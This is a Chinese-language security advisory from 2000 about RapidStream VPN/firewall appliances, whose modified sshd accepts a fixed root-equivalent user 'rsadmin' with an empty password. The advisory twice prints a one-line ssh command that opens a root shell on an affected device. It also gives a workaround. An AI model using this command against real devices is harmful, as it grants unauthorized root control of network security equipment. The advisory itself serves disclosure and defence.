首页 -> 安全研究

安全研究

安全漏洞
RapidStream 认证漏洞允许远程执行命令

发布日期:2000-08-16
更新日期:2000-08-16

受影响系统:

  RapidStream RapidStream 8000
  RapidStream RapidStream 6000
  RapidStream RapidStream 4000
  RapidStream RapidStream 2000

描述:

   RapidStream 是一种 VPN/Firewall 网络设备,每个产品都用修改过的的 sshd
来进行远程管理。这种修改过的 sshd 嵌入了一个固定的用户名(即 rsadmin,并且
rsadmin = root),而且是空口令的。认证是由 RapidStream 远程管理软件来完成
的。不幸的是,也可以用 正常的ssh 客户端在 RapidStream 设备上执行命令:

[root@attacker]# ssh -l rsadmin <ip of vpn> "/bin/sh -i;"

命令行参数中可以指定要执行的命令,这可使sshd 以 root权限执行远程管理程序或者
各种命令。这将严重危害 VPN 设备或防火墙的安全性。

<* 来源:Loki (loki.loa@subdimension.com) *>








测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


[root@attacker]# ssh -l rsadmin <ip of vpn> "/bin/sh -i;"

建议:

暂无。

临时解决办法:

通过防火墙阻断对 RapidStream 设备 22 端口的访问,或者去掉这个改版的 sshd,
开发你自己的管理工具。




浏览次数:5641
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障